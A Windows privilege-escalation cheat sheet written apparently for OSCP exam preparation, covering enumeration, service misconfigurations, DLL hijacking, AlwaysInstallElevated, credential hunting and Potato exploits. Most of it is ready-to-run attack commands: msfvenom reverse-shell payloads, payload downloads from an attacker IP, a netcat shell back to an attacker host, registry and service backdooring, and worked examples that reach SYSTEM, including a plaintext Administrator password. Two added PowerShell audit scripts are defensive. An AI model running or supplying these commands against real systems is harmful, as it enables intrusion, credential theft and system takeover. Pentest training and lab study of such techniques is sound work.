In the OSCP exam, only gaining access is not enough. Most of the machines may require escalating to a higher privilege. To learn more about Windows privilege escalation I have taken a course from Udemy, watched IppSec YouTube videos, and read tutorials from various sources. Whatever I have learned, I took note of.

I have organized my notes as a cheat sheet and now it is public.

Note: A cheat sheet is not understandable without basic knowledge! After all, a cheat sheet is not a tutorial!

Checklist

I would like to follow two standard online checklists and cheat sheets:

  1. Hacktricks escalation checklist
  2. PayloadAllTheThings Escalation CheatSheet

Helpful Tools

  1. WinPEAS: checks for common misconfigurations that may lead to privilege escalation.
  2. PowerUp: a PowerShell script that checks for common vulnerabilities.
  3. Windows-Exploit-Suggester: a Windows kernel exploit suggester.
  4. icacls (Windows): displays the Access Control List of the specified files.

Example:

All tools first need to be transferred to the target machine!

Winpeas:

.\winpeas.exe
.\winpeas.exe serviceinfo

PowerUp:

powershell.exe -exec bypass
. .\PowerUp.ps1
Invoke-AllChecks

Windows Exploit Suggester:

From the target, first collect the output of the systeminfo command and save it on Kali.

python windows-exploit-suggester.py -u
python windows-exploit-suggester.py -d <database>.xls -i systeminfo.txt

icacls:

icacls "path_to_check"

Enumeration

We need to enumerate basic information before attempting to escalate privilege.

#Get Windows Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
#Get patch Information
wmic qfe get Caption, Description, HotFixID, InstalledOn

#Get current username
whoami 

#Get groups, privileges and SID information
whoami /all

#get user list
net user 

#get information for specific user
net user admin

#Get OS information like version, hotfix etc.
systeminfo 

#List all listening ports and connections with the owning PID. Keep note of the suspicious ones!
netstat -ano

#List all profile's firewall rules!
netsh advfirewall firewall show rule name=all 

#List all installed software.
wmic product get name 

#List all installed software and version.
wmic product get name, version 

#Get scheduled task list
schtasks /query /fo LIST /v

#Running Process
tasklist /SVC

#Vulnerable Drivers
driverquery.exe /fo table

Kernel Exploits

Kernel exploits can be dangerous, so a kernel exploit should only be run if there is no other way to escalate privilege.

Get the system information and transfer it to the remote Linux host. This is the command we need to run before we search for exploits on Google or Searchsploit:

$ systeminfo

Use Windows Exploit Suggester to get exploit suggestions:

python windows-exploit-suggester.py -u
python windows-exploit-suggester.py -d <database>.xls -i systeminfo.txt

We can use the information generated by Windows-Exploit-Suggester to find compiled exploits at the following link:

https://github.com/SecWiki/windows-kernel-exploits

Find exploits on Google and Searchsploit. Example:

Google> Windows Version Privilege Escalation Exploit
Searchsploit> $ searchsploit windows 10

Service Exploits

If a service is improperly configured, it may lead to escalation to a higher privilege. There are five ways a service can be exploited:

  1. Insecure Service Permission
  2. Unquoted Service Path
  3. Insecure Registry Permission
  4. Insecure Service Executable
  5. DLL Hijacking

Service Enumeration

We should find out all running services and their versions.

#cmd
tasklist /SVC

#powershell
Get-Service

#wmic
wmic service list brief

Listing All Running Services

sc queryex type= service
powershell.exe -c "Get-Service | Where-Object {$_.Status -eq 'Running'}"

Search for more info on a suspicious service with this cmd/PowerShell command:

sc queryex type= service state= all | find /i "SERVICE_NAME: service_name"
#or
powershell.exe -c "Get-Service | Where-Object {$_.Name -like '*service_name*'}"

Find the status of the target service. We can check with these commands:

sc query service_name 
Get-Service service_name

Modifying a service binary path

sc config service_name binpath= "c:\windows\temp\shell.exe"

Start and Stop a Service

net start serv_name
net stop serv_name

Exploit Insecure Services Permission

We need to find a suspicious service name. If our user has the SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS permission on a service, we can exploit it by changing its binary path.

sc qc service_name
sc config service_name binpath= "c:\windows\temp\backdoor.exe"
net stop service_name
net start service_name
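As an added audit script (not part of the original cheat sheet), the following PowerShell reads each service's security descriptor with sc.exe sdshow and reports services where a broad principal (Everyone, Authenticated Users, Users, Interactive, Anonymous, Guests) holds SERVICE_CHANGE_CONFIG or the rights to rewrite the DACL, which is exactly the binpath weakness described above. It assumes sc.exe is on PATH and that the SDDL rights appear as two-letter tokens rather than a hex mask.

```powershell
# Added audit example, not from the original cheat sheet: list services whose DACL
# grants broad principals rights that allow reconfiguring the service.

# Service-specific SDDL right letters that matter here:
#   DC = SERVICE_CHANGE_CONFIG, WD = WRITE_DAC, WO = WRITE_OWNER, GA/GW = generic all/write
$DangerousRights = 'DC', 'WD', 'WO', 'GA', 'GW'
# Well-known SID abbreviations that mean "almost any user":
#   WD = Everyone, AU = Authenticated Users, BU = Builtin\Users, IU = Interactive,
#   AN = Anonymous, BG = Guests
$BroadPrincipals = 'WD', 'AU', 'BU', 'IU', 'AN', 'BG'

function Get-ServiceDaclFindings {
    param([Parameter(Mandatory)][string]$ServiceName)
    # sc.exe sdshow prints the descriptor on one line starting with "D:"
    $sddl = (& sc.exe sdshow $ServiceName | Where-Object { $_ -match '^D:' }) -join ''
    if (-not $sddl) { return @() }
    # Each ACE looks like (A;;CCLCSWRPWPDTLOCRRC;;;SY): type;flags;rights;guid;guid;sid
    # Only allow ACEs (type A) for broad principals are interesting.
    [regex]::Matches($sddl, '\((A);([^;]*);([^;]*);[^;]*;[^;]*;([^)]*)\)') | ForEach-Object {
        $rights = $_.Groups[3].Value
        $sid    = $_.Groups[4].Value
        if ($BroadPrincipals -notcontains $sid) { return }
        # Rights are two-letter tokens; keep the ones from the dangerous set
        $tokens = [regex]::Matches($rights, '..') | ForEach-Object { $_.Value }
        $hit = $tokens | Where-Object { $DangerousRights -contains $_ }
        if ($hit) {
            [pscustomobject]@{ Service = $ServiceName; Principal = $sid; Rights = ($hit -join ',') }
        }
    }
}

# Walk every service and report the ones a low-privileged user could reconfigure
Get-Service | ForEach-Object { Get-ServiceDaclFindings -ServiceName $_.Name } |
    Format-Table -AutoSize
```

Any row in the output is a service whose DACL should be tightened; an empty result means no broad principal can change the binary path through the service DACL (registry key permissions are a separate check, covered below).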

Exploiting Unquoted Service Path

If a service's binary path is not enclosed in quotes and contains spaces, it may help us escalate privilege. One of the folders in the service path needs to be writable. For example, I found C:\Program Files\Deploy Ready\Service Files\Deploy.exe. In the C:\Program Files\ directory, the "Deploy Ready" and "Service Files" subdirectories are writable. We can exploit this vulnerability to escalate privilege. How does it work?

  1. When the service starts, if it fails to execute Deploy.exe,
  2. it will execute C:\Program Files\Deploy Ready\Service.exe.
  3. If Service.exe is not found, C:\Program Files\Deploy.exe will be executed!

Find Vulnerability

#Manually
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

#With winpeas
.\winPEAS.exe quiet servicesinfo

Test if any directory is writable:

  1. Manually
echo "Test" > "C:\Path a\Path b\Path c\test.txt" #No "permission denied"? We are fine then
icacls "C:\Path a\Path b\Path c\test.txt" #F=Full, W=Write
  2. With accesschk (more efficient)
.\accesschk.exe /accepteula -uwdq C:\
.\accesschk.exe /accepteula -uwdq "C:\Program Files\"
.\accesschk.exe /accepteula -uwdq "C:\Program Files\Service Path"
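As an added audit script (not part of the original cheat sheet), this PowerShell combines the two checks above: it finds every service ImagePath that is unquoted and contains spaces, lists the intermediate .exe paths CreateProcess probes for it (shortest prefix first, e.g. C:\Program.exe before C:\Program Files\Deploy.exe), and flags any whose parent directory lets Everyone, Authenticated Users, Users or Interactive create files. It assumes the Win32_Service CIM class is available; the SIDs in $BroadSids are the standard well-known ones.

```powershell
# Added audit example, not from the original cheat sheet: unquoted service paths
# and whether the directory that would be probed is writable by ordinary users.

# Well-known SIDs: Everyone, Authenticated Users, Builtin\Users, Interactive
$BroadSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4'

function Test-BroadWriteAccess {
    param([string]$Directory)
    try { $acl = Get-Acl -LiteralPath $Directory -ErrorAction Stop } catch { return $false }
    # CreateFiles (== WriteData) on a directory is what dropping a rogue .exe needs
    $wanted = [System.Security.AccessControl.FileSystemRights]::CreateFiles
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # e.g. app-container principals that do not translate
        if ($BroadSids -contains $sid -and ($ace.FileSystemRights -band $wanted)) { return $true }
    }
    return $false
}

function Get-UnquotedPathCandidates {
    param([string]$ImagePath)
    # Take everything up to the first ".exe" as the binary part (arguments may follow)
    $exe = if ($ImagePath -match '^(.*?\.exe)') { $Matches[1] } else { $ImagePath }
    if ($exe.StartsWith('"') -or $exe -notmatch ' ') { return @() }   # quoted or no spaces: safe
    $parts = $exe -split ' '
    # Each space-delimited prefix gets ".exe" appended, in the order Windows tries them:
    #   C:\Program.exe, C:\Program Files\Deploy.exe, C:\Program Files\Deploy Ready\Service.exe
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

$findings = foreach ($svc in (Get-CimInstance Win32_Service | Where-Object { $_.PathName })) {
    foreach ($cand in Get-UnquotedPathCandidates -ImagePath $svc.PathName) {
        [pscustomobject]@{
            Service     = $svc.Name
            StartMode   = $svc.StartMode
            RunsAs      = $svc.StartName
            Probed      = $cand
            WritableDir = Test-BroadWriteAccess -Directory (Split-Path -Path $cand -Parent)
        }
    }
}
$findings | Format-Table -AutoSize
```

Rows with WritableDir set to True and RunsAs LocalSystem are the ones to fix first, either by quoting the ImagePath in the registry or by removing the write permission from the directory.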

Exploit

If we don't have permission to restart the service, we can try to reboot the machine. If the service is configured with AUTO_START and runs as LocalSystem, we will get a SYSTEM shell.

sc qc "service_name"
copy \\smb_ip\Service.exe "C:\Program Files\Deploy Ready\Service.exe"
net start service_name
#If unable to start the service try rebooting
shutdown /r /t 0

Insecure Registry Permission

If we can't write to the service directory, but can modify or write to the service's registry key, we can escalate privilege.

Find Services

#Get all services info with winPEAS
.\winPEAS.exe quiet servicesinfo

#Or query the ImagePath of every service from the registry
reg query hklm\System\CurrentControlSet\Services /s /v imagepath

Confirm Registry weak permission

#Confirm Weak Permission with Powershell command
Get-Acl HKLM:\System\CurrentControlSet\Services\SrvName |Format-List

#Confirm with accesschk
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\SrvName

Exploit

If we have confirmed that we can modify the registry:

#Add Backdoor to the Registry
reg add HKLM\SYSTEM\CurrentControlSet\Services\SrvName /v ImagePath /t REG_EXPAND_SZ /d C:\windows\temp\backdoor.exe /f
#Start the service
net start SrvName

DLL Hijacking

If a program or service can't find a DLL it tries to load from the specified directory, we can supply our own malicious DLL for escalation. The folder the DLL is loaded from needs to be writable!

Check the permissions of the program folder

icacls C:\program\

Create a malicious DLL file and move the payload to the directory the program loads from.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attack_IP LPORT=attacker_port -f dll -o existing.dll

Now try restarting the service or executing the vulnerable program.

Exploit Startup Program

We need to copy accesschk64.exe to the remote host to check permissions. If we have the FILE_ALL_ACCESS permission on a program, we can exploit it for a SYSTEM shell.

accesschk64.exe -wvu "C:\Program Files\Autorun Program"
copy \\smb_ip\backdoor.exe "C:\Program Files\Autorun Program\program.exe"

We can also get an admin session by exploiting startup applications. Check the permissions: if the folder is writable, we just need to copy our shell.exe to that folder and wait for an admin to log in.

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
copy \\smb_ip\bak.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\bak.exe"

Exploiting AlwaysInstallElevated

We need to check if it is enabled. If the AlwaysInstallElevated value is 0x1, we can exploit it!

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Generate a backdoor with Metasploit and transfer it to the victim machine:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tester_ip LPORT=tester_port -f msi -o smb-folder/shell.msi

Copy shell.msi to the victim machine using SMB or another way and run:

msiexec /quiet /qn /i shell.msi

Exploiting Clear Text password

If we are lucky we may find passwords in clear text.

Note: This section is heavily copied from https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials

Finding Wi-Fi passwords

netsh wlan show profile
netsh wlan show profile <SSID> key=clear

Search sensitive files that may contain credentials

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll"

Search for "Password"

#Search suspicious files by filename
dir /s /W *pass* == *cred* == *vnc* == *.config* | findstr /i /v "\\windows"

#Search suspicious files by content
findstr /D:C:\ /si password *.xml *.ini *.txt #A lot of output can be generated
findstr /D:C:\ /M /SI password *.xml *.ini *.txt 2>nul | findstr /V /I "\\AppData\\Local \\WinXsX ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.CloudExperienceHost" 2>nul

Search for passwords in the registry

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" #Autologin
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s #Check the values saved in each session, user/password could be there
reg query "HKCU\Software\OpenSSH\Agent\Key"

# Search for passwords inside all the registry
reg query HKLM /f password /t REG_SZ /s #Look for registry values that contain "password"
reg query HKCU /f password /t REG_SZ /s #Look for registry values that contain "password"

Try with winPEAS:

.\winPEAS.exe quiet filesinfo userinfo

RunAS

Using cmdkey

cmdkey /list
runas /savecred /user:Administrator "c:\windows\temp\backdoor.exe"

By providing credentials

C:\Windows\System32\runas.exe /env /noprofile /user:<username> "c:\users\Public\nc.exe -nv <attacker-ip> 4444 -e cmd.exe"
#runas prompts for the password; it cannot be passed on the command line

Exploiting Well-known Software

Some software installed on the target machine may have a public exploit. We should search Google for an exploit matching the version of the installed software.

tasklist /v 
.\winpeas.exe quiet processinfo

Scheduled Tasks

#from CMD
schtasks /query /fo LIST /v
#In Powershell
PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

For example, the above command found that C:\Tools\Adm.Ps1 runs every 10 minutes as SYSTEM, and we have rights to modify it:

accesschk.exe /accepteula -quvw user C:\Tools\Adm.Ps1

We can simply append our command to be executed as SYSTEM. Let's append a command to run rev.exe (a reverse shell to port 443):

echo C:\windows\temp\rev.exe>> C:\Tools\Adm.Ps1

If everything goes well, we should have a shell as SYSTEM within 10 minutes!

Dangerous User Privileges

Some user privileges are dangerous: they can lead to escalation to a higher privilege. I will list some of them:

SeImpersonatePrivilege

It allows the user to act as any other user, such as Administrator. This can be exploited with JuicyPotato.

SeAssignPrimaryTokenPrivilege

It allows assigning an access token to a new process. This can be exploited with JuicyPotato.

SeBackupPrivilege

If a user has this privilege he is able to read any file. That means the user can extract password hashes from the registry, which could be used for a pass-the-hash attack.

SeRestorePrivilege

This privilege grants a user the ability to modify service binaries and DLLs, and also to modify registry settings.

Other risky privileges

  1. SeCreateTokenPrivilege
  2. SeLoadDriverPrivilege
  3. SeDebugPrivilege

Hot Potato Exploit

A Tutorial: https://pentestlab.blog/2017/04/13/hot-potato/

Windows 7

.\Potato.exe -ip <local ip> -cmd <command to run> -enable_defender true -enable_spoof true -disable_exhaust true

Windows 10

.\Potato.exe -ip <local ip> -cmd <cmd to run> -disable_exhaust true -disable_defender true

Juicy Potato

If the user has the SeImpersonate or SeAssignPrimaryToken privilege, JuicyPotato can be used to escalate privilege.

Note: CLSIDs can be found at: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

JuicyPotato.exe -l 4444 -p C:\Windows\Temp\Rev.exe -t * -c {CLS_ID}

Rogue Potato

Just another Windows local privilege escalation from a service account to SYSTEM. So the requirement is that the compromised account needs to be a service account.

.\RoguePotato.exe -r 192.168.1.11 -l 9999 -e "C:\Windows\Temp\rev.exe"

Quick Real Example

In the same way, we can add a root user to /etc/passwd!

Unquoted Service

systeminfo
Host Name: DEPLOYABLE
OS Name: Microsoft Windows Server 2012 R2 Datacenter
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
--------------------------------------------------
>whoami /all
whoami /all
USER INFORMATION
User Name SID
================= =============================================
deployable\tomcat S-1-5-21-2340103987-1023754366-731290932-1001
GROUP INFORMATION
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
.......
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
.......
PRIVILEGES INFORMATION
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

> wmic product get name, version
>
> powershell -c Invoke-WebRequest "http://10.10.0.67:8000/WinPeas.exe" -OutFile "wino.exe"

> .\wino.exe serviceinfo
......
Deploy(Deploy)[C:\Program Files\Deploy Ready\Service Files\Deploy.exe] - Manual - Stopped - No quotes and Space detected
......
> cd "C:\Program Files\Deploy Ready\"

Generating the exploit in Kali, starting a Python server and listening for the connection:

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.67 LPORT=1337 -f exe > Deploy.exe
$ python3 -m http.server
$ nc -lvp 1338

Downloading and running the exploit on Windows:

sc qc deploy
>powershell -c Invoke-WebRequest "http://10.10.0.67:8000/Deploy.exe" -OutFile "C:\Program Files\Deploy Ready\Service.exe"
>sc start deploy

Clear Text Password

I was just able to get a shell by exploiting BlogEngine. Uploaded winPEAS and it was able to find AutoLogon credentials.

Here are the steps I did in Kali to get Administrator access:

winexe -U Administrator%PzCEKhvj6gQMk7kA //172.3.1.6 cmd.exe

Escalated with JuicyPotato

If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.

Note: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809+.

Generated another shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.67 LPORT=1338 -f exe > shell1338.exe

Uploaded JuicyPotato.exe and the shell1338.exe:

powershell -c Invoke-WebRequest "http://10.10.0.67:8000/shell1338.exe" -OutFile "shell1338.exe"
powershell -c Invoke-WebRequest "http://10.10.0.67:8000/JuicyPotato.exe" -OutFile "JuicyPotato.exe"

Execute for a SYSTEM shell (the CLSID can be found at: http://ohpe.it/juicy-potato/CLSID/ and https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md ; not tested):

JuicyPotato.exe -t * -l 1010 -p shell1338.exe
JuicyPotato.exe -t * -l 1010 -p shell1338.exe -c {cls_id}

Modify Binary to Escalate

I was logged in via evil-winrm. WinPEAS did not find anything, so I tried manual enumeration. Here are the steps of the escalation:

Evil-WinRM PS C:> services
Path Privileges Service
---- ---------- -------
"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" False AmazonSSMAgent
"C:\Program Files\Amazon\XenTools\LiteAgent.exe" False AWSLiteAgent
"C:\Program Files\Amazon\cfn-bootstrap\winhup.exe" False cfn-hup
C:\Services\monitor1.exe True monitor1
C:\Services\monitor2.exe True monitor2
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe False PerfHost
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller

Evil-WinRM PS C:> icacls Services\monitor1.exe
Services\monitor1.exe BUILTIN\Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files

Evil-WinRM PS C:\services> upload /home/bytef/cybsec/monitor1.exe
Info: Uploading /home/bytef/cybsec/monitor1.exe to C:\services\monitor1.exe
Data: 98400 bytes of 98400 bytes copied
Info: Upload successful!
Evil-WinRM PS C:\services> cmd /c "sc start monitor1"
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Evil-WinRM PS C:\services>

And quickly I got a SYSTEM shell.

PayloadAllTheThings